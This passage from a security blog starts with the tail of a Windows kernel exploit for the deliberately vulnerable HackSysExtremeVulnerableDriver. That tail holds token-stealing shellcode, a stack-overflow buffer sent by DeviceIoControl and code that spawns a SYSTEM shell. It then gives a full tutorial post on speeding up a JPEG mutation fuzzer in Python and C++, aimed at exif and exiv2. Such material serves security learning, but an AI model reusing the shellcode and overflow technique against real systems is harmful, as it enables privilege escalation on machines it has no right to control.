        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"
        "\x64\xA1\x24\x01\x00\x00"
        "\x8B\x40\x50"
        "\x89\xC1"
        "\x8B\x98\xF8\x00\x00\x00"
        "\xBA\x04\x00\x00\x00"
        "\x8B\x80\xB8\x00\x00\x00"
        "\x2D\xB8\x00\x00\x00"
        "\x39\x90\xB4\x00\x00\x00"
        "\x75\xED"
        "\x8B\x90\xF8\x00\x00\x00"
        "\x89\x91\xF8\x00\x00\x00"
        "\x61"
        "\x5d"
        "\xc2\x08\x00"
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

Fuzzing Like A Caveman 2: Improving Performance

The Human Machine Interface

h0mbre

8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. This means there won’t be any wholesale changes, we’re simply looking to improve upon what we already had in the previous post. This means we’ll still end up walking away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post, we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMWare Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that being (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

commented out the print statement for the iterations counter every 100 iterations,
added print statements to notify us of any Segfaults,
hardcoded 1k iterations,
added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I snipped only the sections of code where we spent more than 1.0 seconds cumulatively. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time we spent underneath that function was directly related to the function, we see plenty of appeals to the pty module from our pexpect usage. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

def exif(counter,data):

    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function performed the same amount of work in only 2 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds.

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds, this is great performance compared to what we were dealing with. We previously took 122 seconds to do 1,000 iterations! Once again filtering on only time where we spent over 1.0 seconds, we see that we again spent most of our time in exif() but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience, you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the amount of type conversions we do, for instance ints to str or vice versa, and let’s just get less code into our editor. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round, we spent 25 seconds here, this is almost twice as fast at this point. We’re doing a good job of optimizing in my opinion here.

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++ and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of file, creates a string 'data', resizes data to be the same
// size as the file moves the file pointer back to the beginning of the file;
// reads the data from the into the data string;
//
std::string get_bytes(std::string filename)
{
	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrives a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
			if (fgets(buffer, 256, stream) != NULL) output.append(buffer);
				pclose(stream);
	}

	return output;

}

//
// we actually run our exiv2 command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the outputs that result in a segfault or floating point except;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != -1)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
	else if (pos2 != -1)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milleseconds of: Execution Time: 172638ms or 172 seconds.

So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 = 67%. So we’re roughly 33% faster with our C++ implementation. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

